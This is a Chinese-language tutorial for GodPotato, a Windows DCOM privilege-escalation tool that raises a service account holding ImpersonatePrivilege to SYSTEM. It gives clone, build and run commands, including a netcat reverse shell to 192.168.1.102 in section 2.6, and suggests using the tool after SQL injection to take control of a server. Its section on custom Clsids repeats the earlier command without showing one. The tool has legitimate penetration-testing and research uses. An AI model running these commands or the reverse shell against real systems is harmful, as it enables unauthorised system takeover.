GodPotato 使用教程

1. 项目介绍

GodPotato 是一个基于 DCOM（Distributed Component Object Model）技术的 Windows 权限提升工具。它利用了 Windows 系统中 rpcss 服务处理 oxid 时的缺陷，能够在 Windows Server 2012 到 Windows Server 2022 以及 Windows 8 到 Windows 11 的系统上进行权限提升。GodPotato 只需要用户具备 "ImpersonatePrivilege" 权限，通常 Web 服务和数据库服务默认具备此权限。通过 GodPotato，用户可以将低权限的服务用户提升到 "NT AUTHORITY\SYSTEM" 权限。

2. 项目快速启动

2.1 环境准备

确保你已经安装了 .NET 运行环境，并且目标系统是 Windows Server 2012 到 Windows Server 2022 或 Windows 8 到 Windows 11。

2.2 下载 GodPotato

你可以通过以下命令克隆 GodPotato 项目：

git clone https://github.com/BeichenDream/GodPotato.git

2.3 编译项目

进入项目目录并编译：

cd GodPotato
dotnet build

2.4 运行 GodPotato

编译完成后，你可以使用以下命令来运行 GodPotato：

dotnet run -- -cmd "cmd /c whoami"

这条命令会使用 GodPotato 的内置 Clsid 进行权限提升，并执行 whoami 命令来显示当前用户。

2.5 自定义 Clsid 和命令

你也可以自定义 Clsid 和执行的命令，例如：

dotnet run -- -cmd "cmd /c whoami"

2.6 执行反向 shell 命令

如果你想执行反向 shell 命令，可以使用以下示例：

dotnet run -- -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"

3. 应用案例和最佳实践

3.1 权限提升

GodPotato 主要用于在获得 Web 或数据库服务权限后，将低权限用户提升到系统权限。例如，当你通过 SQL 注入或其他方式获得数据库服务器的低权限访问时，可以使用 GodPotato 提升权限，进而控制整个系统。

3.2 渗透测试

在渗透测试中，GodPotato 是一个非常有用的工具，可以帮助测试人员快速提升权限，验证系统的安全性。通过 GodPotato，测试人员可以模拟攻击者行为，发现系统中的潜在漏洞。

3.3 安全研究

GodPotato 也可以用于安全研究，帮助研究人员深入理解 Windows 系统的权限管理和 DCOM 技术。通过分析 GodPotato 的实现原理，研究人员可以发现更多系统中的安全问题，并提出相应的解决方案。

4. 典型生态项目

4.1 RottenPotato

RottenPotato 是 GodPotato 的前身，它利用了 Windows 系统中的 Token 复制技术进行权限提升。虽然 RottenPotato 在较新的 Windows 系统上无法使用，但它为 GodPotato 的开发提供了重要的技术基础。

4.2 JuicyPotato

JuicyPotato 是另一个基于 DCOM 技术的权限提升工具，它在 RottenPotato 的基础上进行了改进，支持更多的 Windows 版本。JuicyPotato 和 GodPotato 在技术上有一定的相似性，但 GodPotato 在最新的 Windows 系统上表现更为稳定。

4.3 PrintSpoofer

PrintSpoofer 是另一个利用 Windows 打印服务进行权限提升的工具。它与 GodPotato 不同，主要利用了打印服务的漏洞。PrintSpoofer 和 GodPotato 可以结合使用，进一步提升权限提升的成功率。

通过以上模块的介绍，你应该能够快速上手使用 GodPotato，并在实际应用中发挥其强大的权限提升功能。